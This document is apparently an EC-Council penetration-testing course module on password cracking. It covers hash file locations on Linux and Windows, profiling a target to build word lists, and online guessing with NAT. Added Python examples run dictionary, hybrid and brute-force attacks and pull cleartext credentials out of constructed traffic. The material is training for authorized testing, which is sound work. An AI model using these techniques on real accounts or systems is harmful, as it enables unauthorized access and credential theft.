LPTv4 Module 25 Password Cracking Penetration Testing_NoRestriction

Post on 08-Nov-2014


ECSA/LPT

EC-Council Module XXV

Password Cracking Penetration Testing

Penetration Testing Roadmap

Start Here
Information Gathering
Vulnerability Analysis
External Penetration Testing
Firewall Penetration Testing
Router and Switches Penetration Testing
Internal Network Penetration Testing
IDS Penetration Testing
Wireless Network Penetration Testing
Denial of Service Penetration Testing
Password Cracking Penetration Testing
Stolen Laptop, PDAs and Cell Phones Penetration Testing
Social Engineering Penetration Testing
Application Penetration Testing
Cont'd

EC-CouncilCopyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Penetration Testing Roadmap (cont'd)

Cont'd
Physical Security Penetration Testing
Database Penetration Testing
VoIP Penetration Testing
Virus and Trojan Detection
War Dialing
VPN Penetration Testing
Log Management Penetration Testing
File Integrity Checking
Blue Tooth and Hand held Device Penetration Testing
Telecommunication And Broadband Communication Penetration Testing
Email Security Penetration Testing
Security Patches Penetration Testing
Data Leakage Penetration Testing
End Here

Passwords

Companies protect their resources by using combinations of user IDs and passwords.

Hackers can brute force or guess the passwords of web applications.

Some system software products use weak or no encryption to store and/or transmit their user IDs and passwords from the client to the server.

One of the leading causes of network compromises is the use of easily guessable or decipherable passwords.

Common Password Vulnerabilities

Weak passwords are:

• Easily guessable, i.e. pet names, car number, family member's name, etc.
• Comprised of common vocabulary words.

Improper handling of strong passwords:

• Involves the need for the user to write down the password in an insecure location.

Password Cracking Techniques

• Guessing
• Shoulder surfing
• Social engineering
• Using password crackers or network analyzers

Types of Password Cracking Attacks

Dictionary attack: compares a list of candidate words (a word list) against the hashes in a password database; it succeeds only when the password is in the list.

Brute-force attack: tries every combination of characters from a chosen character set (letters, numbers and symbols) up to a given length until the password is found; it always succeeds eventually, but the time required grows exponentially with password length and character-set size.

Hybrid attack: a dictionary attack whose words are mangled by rules, typically appending or prepending numbers and symbols to each dictionary word (so "rebecca" also yields "Rebecca1", "rebecca!" and "Rebecca1984"); it catches the common habit of decorating a dictionary word to satisfy a password policy.

Steps in Password Cracking Penetration Testing

1. Extract /etc/passwd and /etc/shadow files on Linux systems
2. Extract the SAM file on Windows machines
3. Identify the target person's personal profile
4. Build a dictionary of word lists
5. Attempt to guess passwords
6. Brute force passwords
7. Use automated password crackers to break password-protected files

Step 1: Extract /etc/passwd and /etc/shadow Files in Linux Systems

root:!:0:0:root:/root:/bin/tcsh
bin:!:1:1:bin:/bin:
daemon:!:2:2:daemon:/sbin:
adm:!:3:4:adm:/var/adm:
lp:!:4:7:lp:/var/spool/lpd:
sync:!:5:0:sync:/sbin:/bin/sync
shutdown:!:6:0:shutdown:/sbin:/sbin/shutdown
halt:!:7:0:halt:/sbin:/sbin/halt
mail:!:8:12:mail:/var/spool/mail:
news:!:9:13:INN (NNTP Server) Admin ID, 525-2525:/usr/local/lib/inn:/bin/ksh
uucp:!:10:14:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
operator:!:0:0:operator:/root:/bin/tcsh
games:!:12:100:games:/usr/games:
man:!:13:15:man:/usr/man:
postmaster:!:14:12:postmaster:/var/spool/mail:/bin/tcsh
httpd:!:15:30:httpd:/usr/sbin:/usr/sbin/httpd:
nobody:!:65535:100:nobody:/dev/null:
ftp:!:404:100::/home/ftp:/bin/nologin
nomad:!:501:100:Simple Nomad, 525-5252:/home/nomad:/bin/bash
webadmin:!:502:100:Web Admin Group ID:/home/webadmin:/bin/bash
thegnome:!:503:100:Simple Nomad's Old Account:/home/thegnome:/bin/tcsh
dorkus:!:504:100:Alternate account for Fred:/home/dorkus:/bin/tcsh

The password file for Linux is located in /etc and is a text file called passwd.

By default and design, this file is world readable by anyone on the system.

On a Unix system using NIS/yp or password shadowing the password data may be located elsewhere. This "shadow" file is usually where the password hashes themselves are located. On a shadowed system the second field of each passwd record holds only a placeholder ("x", or "!" as in this listing) and /etc/shadow is readable by root only, so extracting the hashes needs root access, an arbitrary file read, a backup copy or an offline disk image.

Read the passwd file itself as evidence, not just as a source of user names: this listing has a second UID 0 account, operator, and any non-root account with UID 0 is a finding in its own right.

Linux Password Example

nomad:HrLNrZ3VS3TF2:501:100:Simple Nomad:/home/nomad:/bin/bash

This is what the fields actually are:

• nomad: Account or user name, what you type in at the login prompt
• HrLNrZ3VS3TF2: One-way encrypted password (plus any aging info); a 13-character value like this is a traditional DES crypt(3) hash, which uses a 2-character salt, ignores everything after the eighth password character and is cheap to crack
• 501: User number (UID)
• 100: Group number (GID)
• Simple Nomad: GECOS information
• /home/nomad: Home directory
• /bin/bash: Program to run on login, usually a shell

Linux Shadow File Example

nomad:$1$fnffc$GteyHdicpGOfffXX40w#5:13064:0:99999:7

This is what the fields actually are:

• nomad: Account or user name, what you type in at the login prompt
• $1$fnffc$GteyHdicpGOfffXX40w#5: Password hash; the $1$ prefix marks MD5-crypt with the salt fnffc (other prefixes you will meet: $5$ SHA-256 crypt, $6$ SHA-512 crypt, $2b$ or $2y$ bcrypt, $y$ yescrypt). An empty field means no password is required at all; "*" or a leading "!" means the account is locked.
• 13064: Last password change, in days since 1 January 1970
• 0: Minimum number of days required between password changes
• 99999: Maximum number of days the password is valid (99999 effectively means the password never expires)
• 7: The number of days the user is warned before the password expires

Modern shadow records carry three further fields (days of inactivity allowed after expiry, account expiry date, and a reserved field); they are omitted from this example.
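The parser below is added here as an example and is not part of the EC-Council module. It reads records in the two formats above, classifies the password field by its prefix, and raises the findings a tester would write up: a second UID 0 account, a hash left in the world-readable passwd file, empty passwords, and hash types that crack cheaply. The sample records are constructed from the slide listings (nomad's passwd record is given the DES hash from the "Linux Password Example" to show the unshadowed case); the SHA-512 crypt entry is a placeholder of the right shape, not a real hash.

```python
"""Audit /etc/passwd and /etc/shadow records the way a tester reads them.

Added example, not part of the original module. The sample records are
constructed from the slide listings; the SHA-512 crypt value is a placeholder.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input (modelled on the slide listing, not a real system).
PASSWD_SAMPLE = """\
root:!:0:0:root:/root:/bin/tcsh
operator:!:0:0:operator:/root:/bin/tcsh
nomad:HrLNrZ3VS3TF2:501:100:Simple Nomad:/home/nomad:/bin/bash
ftp:!:404:100::/home/ftp:/bin/nologin
games::12:100:games:/usr/games:
"""
FAKE_SHA512 = "$6$saltsalt$" + "x" * 86   # placeholder of the right shape, not a real hash
SHADOW_SAMPLE = f"""\
nomad:$1$fnffc$GteyHdicpGOfffXX40w#5:13064:0:99999:7
root:{FAKE_SHA512}:13064:0:99999:7:::
daemon:*:13064:0:99999:7:::
guest::13064:0:99999:7:::
"""

DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")
HASH_PREFIXES = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt",
}
WEAK_HASHES = {"descrypt", "md5crypt"}   # fast hashes that crack at scale on commodity hardware


@dataclass
class PasswdEntry:
    name: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


@dataclass
class ShadowEntry:
    name: str
    hash: str
    last_change: Optional[int]
    min_days: Optional[int]
    max_days: Optional[int]
    warn_days: Optional[int]


def _int_or_none(field: str) -> Optional[int]:
    return int(field) if field.strip() else None


def parse_passwd(text: str) -> List[PasswdEntry]:
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"malformed passwd record: {line!r}")
        entries.append(PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6]))
    return entries


def parse_shadow(text: str) -> List[ShadowEntry]:
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) < 2:
            raise ValueError(f"malformed shadow record: {line!r}")
        f += [""] * (9 - len(f))      # tolerate the older 6-field form shown on the slide
        entries.append(ShadowEntry(f[0], f[1], *(_int_or_none(x) for x in f[2:6])))
    return entries


def hash_kind(field: str) -> str:
    """Classify the password field of a passwd or shadow record."""
    if field == "":
        return "empty"          # no password required at all
    if field == "x":
        return "shadowed"       # hash lives in /etc/shadow
    if field == "*" or field.startswith("!"):
        return "locked"         # "*", "!" and "!!" never match any password
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    if DES_CRYPT.match(field):
        return "descrypt"
    return "unknown"


def audit(passwd_text: str, shadow_text: str) -> List[str]:
    """Return the findings a tester would raise from the two files."""
    findings = []
    for e in parse_passwd(passwd_text):
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 account besides root")
        kind = hash_kind(e.password)
        if kind == "empty":
            findings.append(f"{e.name}: empty password field in /etc/passwd")
        elif kind not in ("shadowed", "locked"):
            findings.append(f"{e.name}: {kind} hash exposed in world-readable /etc/passwd")
    for e in parse_shadow(shadow_text):
        kind = hash_kind(e.hash)
        if kind == "empty":
            findings.append(f"{e.name}: empty password in /etc/shadow")
        elif kind in WEAK_HASHES:
            findings.append(f"{e.name}: crackable {kind} hash in /etc/shadow")
        elif kind == "unknown":
            findings.append(f"{e.name}: unrecognised hash format in /etc/shadow")
    return findings


if __name__ == "__main__":
    for finding in audit(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(finding)
```

Point it at real files with `audit(open("/etc/passwd").read(), open("/etc/shadow").read())` once you have root; the hash classification is what decides which entries are worth feeding to a cracker first.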

Check Other Linux & UNIX Variants

Passwords can also be stored in these files:

• /etc/security/passwd (AIX; accessible by root only)
• /.secure/etc/passwd (HP-UX trusted mode; accessible by root only)
• /etc/master.passwd (BSD systems; accessible by root only)

Step 2: Extract SAM File Windows Machines

Windows NT/2000/XP passwords are stored as hashes in the SAM registry hive, the file %SystemRoot%\system32\config\SAM (c:\winnt\system32\config\SAM on a default Windows 2000 installation).

The file is named SAM and is locked by the operating system while Windows is running, so it cannot simply be copied: tools either read the hashes from the live registry with administrative privileges or the file is taken from a backup, a shadow copy or an offline disk. Since Windows 2000 the hashes are additionally encrypted with the SYSKEY boot key, so the SYSTEM hive is needed as well to decrypt them offline.

Extraction tools:

• SAMDUMP
• PWDUMP
• L0phtcrack

Extract Backup of SAM/Emergency Repair Disk

Windows also stores passwords in a backup of the SAM file in the c:\winnt\repair directory (refreshed when an emergency repair disk is created) or on the emergency repair disk itself. The backup is not locked while Windows runs, so check its permissions: it is often readable by more users than the live hive.

Check Registry

Windows applications store passwords in the Registry or as plaintext files on the hard drive.

Check Microsoft's Server Message Block (SMB) Protocol

Check for vulnerabilities in the SMB protocol, which is used for file and print sharing.

Run the NetBIOS Auditing Tool (NAT) against the target to try user name and password combinations over SMB:

nat -u userlist.txt -p passlist.txt IP_address

where userlist.txt and passlist.txt are the user name and password lists built in the earlier steps. This is an online attack: every attempt is a real logon, so check the account lockout policy first or the test will lock out the very accounts it is meant to assess.

Check the Active Directory Database

Check for password hashes in the Active Directory database file (ntds.dit, by default under %SystemRoot%\NTDS on each domain controller). The database is replicated across domain controllers, so every one of them holds the hashes for the whole domain.

Step 3: Identify the Target Person's Personal Profile

If you are trying to guess Rebecca's password on her desktop, then compile a list of items she likes.

Example:

• Favorite car
• Birthday, anniversary day, and other special occasions
• Movies, music, sports, drama, and arts
• Education, cartoon characters, novelists
• Parents, relatives, kids names
• Country, city, holiday resorts, etc.
• Project working on

Step 4: Build a Dictionary of Word Lists

Build a word list based on the information from the previous slide.

Tools:

• Dictionary maker
• Pass list

Step 5: Attempt to Guess Passwords

Obtaining a legitimate user ID is not an easy task.

User IDs are usually created from a variation of the employee's first name and last name.

Email addresses posted on the organization's website reveal the user ID format in use.

Acquiring a copy of the organization's internal telephone directory helps in discovering and constructing valid user IDs.

Many system software products are initially configured with default user IDs and passwords, designed to let vendors perform remote transactions; they are frequently left unchanged.

Step 6: Brute Force Passwords

Run a dictionary attack and a brute-force attack to crack the passwords.

Tools:

• Brutus
• L0phtcrack
• Munga bunga
• Password cracker

Step 6: Brute Force Passwords (cont'd)

Resources:

• www.antifork.org
• www.bindview.com
• www.cerberus-infosec.co.uk
• www.hackersclub.com
• www.hoobie.net
• www.intrusion.com
• www.nai.com
• www.nmrc.org
• http://packetstorm.decepticons.org
• www.phenoelit.de
• www.securitysoftwaretech.com
• www.users.dircon.co.uk/~crypto
• www.waveset.com
• ftp://ftp.cerias.purdue.edu/pub/dict
• ftp://ftp.ox.ac.uk/pub/wordlists
• packetstormsecurity.nl/Crackers/wordlists
• http://www.outpost9.com/files/WordLists.html
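The script below is added here and is not part of the module; it ties together the three attack types defined earlier (dictionary, hybrid, brute force) with Steps 3, 4 and 6 in one runnable example. The profile for the fictitious target, the salt and the victim passwords are all constructed, and salted SHA-256 stands in for the real hash functions (crypt(3) on Unix, the NT hash on Windows) so that it runs with only the standard library; the attack logic is the same whatever the hash. It shows the plain profile dictionary failing, the hybrid mangling rules succeeding, and an exhaustive search covering a short alphanumeric token.

```python
"""Targeted word list plus dictionary, hybrid and brute-force attacks.

Added example, not from the module. Profile, salt and victim passwords are
constructed; salted SHA-256 is an assumption made to keep the demo
self-contained (real targets use crypt(3) variants or NT hashes).
"""
import hashlib
import itertools
from typing import Iterable, Iterator, List, Optional, Tuple

# Constructed profile for a fictitious target, gathered as in Step 3.
PROFILE = {
    "names": ["Rebecca", "Max", "Toby"],           # target, kids, pet
    "interests": ["Mustang", "Coldplay", "Dune"],  # car, music, movie
    "places": ["Boston", "Aspen"],                 # city, holiday resort
    "dates": ["1984", "0712"],                     # birth year, anniversary
}
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SUFFIXES = ["", "1", "123", "!", "1!", "2014", "2015"]
SALT = b"constructed-salt"


def hash_password(password: str, salt: bytes) -> str:
    return hashlib.sha256(salt + password.encode()).hexdigest()


def base_words(profile: dict) -> List[str]:
    """Step 4, plain dictionary: the profile words, lower-cased and de-duplicated."""
    words: List[str] = []
    for group in profile.values():
        for w in group:
            if w.lower() not in words:
                words.append(w.lower())
    return words


def hybrid_wordlist(profile: dict) -> Iterator[str]:
    """Hybrid rules: case variants, leetspeak, word+date joins, number/symbol suffixes."""
    dates = profile.get("dates", [])
    seen = set()
    for w in base_words(profile):
        stems = [w, w.capitalize(), w.upper(), w.translate(LEET)]
        for d in dates:
            stems += [w + d, w.capitalize() + d, d + w]
        for stem in stems:
            for suffix in SUFFIXES:
                candidate = stem + suffix
                if candidate not in seen:
                    seen.add(candidate)
                    yield candidate


def dictionary_attack(target: str, salt: bytes, candidates: Iterable[str]) -> Tuple[Optional[str], int]:
    """Hash each candidate and compare; returns (password or None, attempts made)."""
    tried = 0
    for c in candidates:
        tried += 1
        if hash_password(c, salt) == target:
            return c, tried
    return None, tried


def brute_force(target: str, salt: bytes, charset: str, max_len: int) -> Tuple[Optional[str], int]:
    """Exhaustive search over charset for lengths 1..max_len."""
    tried = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            tried += 1
            c = "".join(combo)
            if hash_password(c, salt) == target:
                return c, tried
    return None, tried


def keyspace(charset_size: int, max_len: int) -> int:
    """Candidates brute force must cover in the worst case; grows exponentially."""
    return sum(charset_size ** n for n in range(1, max_len + 1))


# Constructed victim hashes: a decorated profile word and a short random-looking token.
TARGET = hash_password("Rebecca1984!", SALT)
SHORT_TARGET = hash_password("7q2", SALT)
ALNUM = "abcdefghijklmnopqrstuvwxyz0123456789"

if __name__ == "__main__":
    print("plain dictionary:", dictionary_attack(TARGET, SALT, base_words(PROFILE)))
    print("hybrid rules:", dictionary_attack(TARGET, SALT, hybrid_wordlist(PROFILE)))
    print("brute force:", brute_force(SHORT_TARGET, SALT, ALNUM, 3))
    print("8-char printable-ASCII keyspace:", keyspace(95, 8))
```

The attempt counts returned alongside each result are the point: the hybrid list stays in the low thousands while `keyspace(95, 8)` shows why brute force is reserved for short or policy-constrained passwords.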

Step 7: Use Automated Password Crackers to Break Password-Protected Files

Automated password cracking tools systematically guess passwords.

Tools:

• Brutus: www.antifork.org / hoobie.net
• Cerberus Internet Scanner: www.cerberus-infosec.co.uk
• Crack: www.users.dircon.co.uk/~crypto
• CyberCop Scanner[a]: www.nai.com
• Inactive Account Scanner: www.waveset.com
• Legion and NetBIOS Auditing Tool (NAT): www.hackersclub.com
• L0phtcrack: www.securitysoftwaretech.com
• John the Ripper, SAMDump, PWDump, PWDump2, PWDump3: www.nmrc.org
• SecurityAnalyst: www.intrusion.com
• TeeNet: www.phenoelit.de
• WebCrack: www.packetstorm.decepticons.org

Extract Cleartext Passwords from the Registry

Logon passwords may be stored in cleartext in the Registry when automatic logon is configured:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Check the DefaultUserName, DefaultPassword and AutoAdminLogon values under this key: with AutoAdminLogon enabled, DefaultPassword holds the account's password in plain text, and the key is readable by ordinary users.

Extract Cleartext Passwords from an Encrypted LM Hash

Use the Cain and Abel tool to recover the cleartext password from an LM hash.

LM hashes are easy to crack because of how they are built: the password is converted to upper case, padded or truncated to 14 characters and split into two 7-character halves, and each half is used as a DES key independently, with no salt. An attacker therefore only has to crack two 7-character, case-insensitive strings, and precomputed tables do that in minutes. Recommend enabling the NoLMHash policy and using passwords of 15 or more characters, either of which stops the LM hash from being stored at all.

Sniff Cleartext Passwords from the Wire

FTP, HTTP, POP3, SMTP and IMAP send passwords as cleartext unless the session is wrapped in TLS.

Run a sniffer to capture them.

Tool:

• dsniff
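The extractor below is added here and is not part of the module or of dsniff; it shows what a sniffer pulls out of the cleartext protocols named above. The "captured" client-to-server payloads are constructed inline and keyed by destination port; the script recovers FTP and POP3 USER/PASS pairs, HTTP Basic credentials, SMTP AUTH PLAIN and IMAP LOGIN, and ignores the TLS flow, which carries nothing readable.

```python
"""Pull cleartext credentials out of captured client-to-server payloads.

Added example, not part of the module and not dsniff's code. The payloads
below are constructed, not a real capture; they imitate what FTP, POP3, HTTP,
SMTP and IMAP clients send when no TLS is in use.
"""
import base64
import re
import shlex
from typing import List, Optional, Tuple

Credential = Tuple[str, str, str]   # (protocol, user name, password)

# Constructed "capture": (destination port, client-to-server payload).
CAPTURED = [
    (21, "USER alice\r\nPASS Winter2014!\r\nLIST\r\n"),
    (110, "USER bob@example.com\r\nPASS hunter2\r\nSTAT\r\n"),
    (80, "GET /admin/ HTTP/1.1\r\nHost: intranet.example.com\r\n"
         "Authorization: Basic Y2Fyb2w6U3VtbWVyMjAxNA==\r\n\r\n"),
    (25, "EHLO mail\r\nAUTH PLAIN AGRhdmUAczNjcjN0\r\nMAIL FROM:<dave@example.com>\r\n"),
    (143, 'a001 LOGIN erin "p@ss word"\r\na002 SELECT INBOX\r\n'),
    (443, "\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"),   # TLS ClientHello: nothing readable
]
PORT_PROTO = {21: "FTP", 110: "POP3", 80: "HTTP", 25: "SMTP", 143: "IMAP"}


def _decode_b64(token: str) -> Optional[str]:
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:           # binascii.Error is a ValueError subclass
        return None


def extract_user_pass(proto: str, payload: str) -> List[Credential]:
    """FTP and POP3 send USER then PASS as separate lines."""
    creds, user = [], None
    for line in payload.splitlines():
        m = re.match(r"(?i)^(USER|PASS)\s+(.*)$", line)
        if not m:
            continue
        if m.group(1).upper() == "USER":
            user = m.group(2)
        elif user is not None:
            creds.append((proto, user, m.group(2)))
            user = None
    return creds


def extract_http_basic(payload: str) -> List[Credential]:
    """HTTP Basic is base64("user:password"), i.e. cleartext with extra steps."""
    creds = []
    for m in re.finditer(r"(?im)^Authorization:\s*Basic\s+(\S+)", payload):
        decoded = _decode_b64(m.group(1))
        if decoded and ":" in decoded:
            user, password = decoded.split(":", 1)
            creds.append(("HTTP", user, password))
    return creds


def extract_smtp_plain(payload: str) -> List[Credential]:
    """SMTP AUTH PLAIN is base64(authzid NUL user NUL password)."""
    creds = []
    for m in re.finditer(r"(?im)^AUTH PLAIN\s+(\S+)", payload):
        decoded = _decode_b64(m.group(1))
        if decoded and decoded.count("\0") == 2:
            _authzid, user, password = decoded.split("\0")
            creds.append(("SMTP", user, password))
    return creds


def extract_imap_login(payload: str) -> List[Credential]:
    """IMAP: <tag> LOGIN user password, with quoting for spaces."""
    creds = []
    for m in re.finditer(r"(?im)^\S+\s+LOGIN\s+(.+)$", payload):
        try:
            parts = shlex.split(m.group(1).strip())
        except ValueError:      # unbalanced quotes: skip rather than guess
            continue
        if len(parts) == 2:
            creds.append(("IMAP", parts[0], parts[1]))
    return creds


def extract_credentials(flows) -> List[Credential]:
    found: List[Credential] = []
    for port, payload in flows:
        proto = PORT_PROTO.get(port)
        if proto in ("FTP", "POP3"):
            found += extract_user_pass(proto, payload)
        elif proto == "HTTP":
            found += extract_http_basic(payload)
        elif proto == "SMTP":
            found += extract_smtp_plain(payload)
        elif proto == "IMAP":
            found += extract_imap_login(payload)
        # any other port (e.g. 443/TLS) is skipped: no cleartext to harvest
    return found


if __name__ == "__main__":
    for proto, user, password in extract_credentials(CAPTURED):
        print(f"{proto:5} {user!r} / {password!r}")
```

Feeding it real traffic means reassembling TCP streams first (from a pcap, or from a sniffer like dsniff that already does this); the parsing stays the same, and every hit is a finding that the service should be moved behind TLS.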

Replay Attack to Crack Password

A replay attack intercepts the data packets carrying an authentication exchange and resends them to the receiving server without decrypting them. It succeeds against protocols whose authentication includes no nonce, timestamp or session binding that would make the captured exchange single-use.

Intercept the communication using a network analyzer or sniffer such as Ethereal, tcpdump, or WinDump.

Tool: SAMInside 2.5.8.0 (pwdump)

Extracts Windows NT/2000/XP/2003 user names and password hashes, with support for national (non-ASCII) character encodings.

SAMInside 2.5.8.0 (pwdump): Screenshot

Tool: Dictionary Maker

Dictionary Maker is a tool to compose dictionaries (word lists) for password recovery using multiple source text files.

Tool: Password List Recovery 2.6

Password List Recovery shows all the passwords in the current Windows user's Password List (PWL) file.

PWL files are kept in the Windows directory and have a .PWL extension. They are a Windows 95/98/Me feature: cached network and dial-up passwords protected only by the user's logon password.

Password List Recovery 2.6: Screenshot

Summary

Passwords protect computer resources and files from unauthorized access by malicious users.

A combination of passwords and user IDs is used by companies to protect their resources against intrusion by hackers and thieves.

The password file for Linux is located in /etc and is a text file called passwd.

By default and design, the passwd file is world readable by anyone on the system, so on its own it cannot keep password hashes away from other users; shadowing moves the hashes into a root-only file.

SAMDUMP, PWDUMP and L0phtcrack extract password hashes from the Windows SAM.

A word list needs to be built up using the previous slides in order to break through the password of the victim.